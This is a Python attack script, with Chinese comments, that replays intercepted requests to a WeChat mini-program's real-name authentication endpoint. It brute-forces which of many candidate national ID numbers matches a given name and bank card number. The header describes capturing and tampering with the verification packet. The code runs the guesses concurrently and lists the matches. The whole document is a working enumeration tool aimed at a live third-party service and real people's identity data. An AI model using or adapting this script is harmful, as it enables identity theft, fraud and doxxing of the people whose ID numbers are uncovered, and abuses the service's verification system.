##小程序://智企行平台/gBLBqDzZRo09gAJ登陆实名认证抓包填写银行卡三要素 身份证最后一位改成错的找包改数据
import requests
import json
from concurrent.futures import ThreadPoolExecutor, as_completed
import time

# 记录开始时间
start_time = time.time()

# User inputs
name = input("姓名:")
bankcard = input("银行卡号:")

# Read IDs from file
try:
    with open("1.txt", "r", encoding="utf-8") as f:
        ids = [line.strip() for line in f.readlines() if line.strip()]
except FileNotFoundError:
    print("错误:未找到1.txt文件")
    exit()

if not ids:
    print("错误:1.txt文件中没有有效的身份证号")
    exit()

# Configuration
openId = "oWOpy5RqEcv5wj8ubeO90KDK-q8Y"
appid = "wx7e444a1e0b9d3fd1"
token = "替换"

url = "https://sp.hui7z.com/sohoBasic/v2/realAuth"
Authorization = f"Bearer {token}"

headers = {
    'User-Agent': "Mozilla/5.0 (Linux; Android 13; M2012K10C Build/TP1A.220624.014; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/130.0.6723.103 Mobile Safari/537.36 XWEB/1300473 MMWEBSDK/20250201 MMWEBID/2982 MicroMessenger/8.0.57.2820(0x28003938) WeChat/arm64 Weixin NetType/5G Language/zh_CN ABI/arm64 miniProgram/wx7e444a1e0b9d3fd1",
    'Accept': "application/json, text/plain, */*",
    'Accept-Encoding': "gzip, deflate, br, zstd",
    'sec-ch-ua-platform': "\"Android\"",
    'Authorization': Authorization,
    'sec-ch-ua': "\"Chromium\";v=\"130\", \"Android WebView\";v=\"130\", \"Not?A_Brand\";v=\"99\"",
    'Content-Type': "application/json;charset=UTF-8",
    'sec-ch-ua-mobile': "?1",
    'Origin': "https://sp.hui7z.com",
    'X-Requested-With': "com.tencent.mm",
    'Sec-Fetch-Site': "same-origin",
    'Sec-Fetch-Mode': "cors",
    'Sec-Fetch-Dest': "empty",
    'Referer': "https://sp.hui7z.com/saas-applet-h5/my/information",
    'Accept-Language': "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7"
}

params = {
    'openId': openId,
    'appid': appid,
    'token': token,
    'tenant': "zhiqixing",
    'levyCode': "*",
    'merId': "*",
    'mobile': "18888888888"
}

# Statistics tracking
total_count = 0
success_count = 0
failed_count = 0
success_ids = []

def verify_id_card(card):
    global total_count, success_count, failed_count, success_ids
    
    payload = json.dumps({
        "mobile": "18888888888",
        "openId": "oWOpy5QKkAryXP-cpOksa25xKYhk",
        "merId": "*",
        "levyCode": "*",
        "name": name,
        "idCard": card,
        "bankCard": bankcard,
        "bankCardPic": "",
        "idCardBack": "",
        "idCardFront": "",
        "taxVoucher": "",
        "thumbVideoPath": ""
    })

    try:
        response = requests.post(url, params=params, data=payload, headers=headers)
        response_data = response.json()
        
        total_count += 1
        msg = response_data.get('msg', '无msg字段')
        
        if response_data.get('code') == -10:
            failed_count += 1
            return f"{name}-{card}-{bankcard}-银行卡三要素不一致❌"
        elif response_data.get('code') == 0:
            if isinstance(response_data.get('data'), dict) and response_data['data'].get('name', {}) == name:
                success_count += 1
                success_ids.append(card)
                return f"{name}-{card}-{bankcard}-银行卡三要素一致✅"
            else:
                failed_count += 1
                return f"{name}-{card}-{bankcard}-响应数据不完整,验证失败❌"
        else:
            failed_count += 1
            return f"未知响应: {response.text}"
        
    except Exception as e:
        failed_count += 1
        return f"核验身份证 {card} 时出错: {str(e)}"

with ThreadPoolExecutor(max_workers=15) as executor:
    futures = [executor.submit(verify_id_card, card) for card in ids]
    
    for future in as_completed(futures):
        result = future.result()
        print(result)

if success_ids:
    print("\n验证通过的身份证号:")
    for id_card in success_ids:
        print(f"{name}-{id_card}-{bankcard}银行卡三要素一致✅")
else:
    print("\n没有验证通过的身份证号")
print("批量核验完成!")

# 记录结束时间并计算总耗时
end_time = time.time()
total_duration = end_time - start_time
print(f"核验总耗时: {total_duration:.2f} 秒")
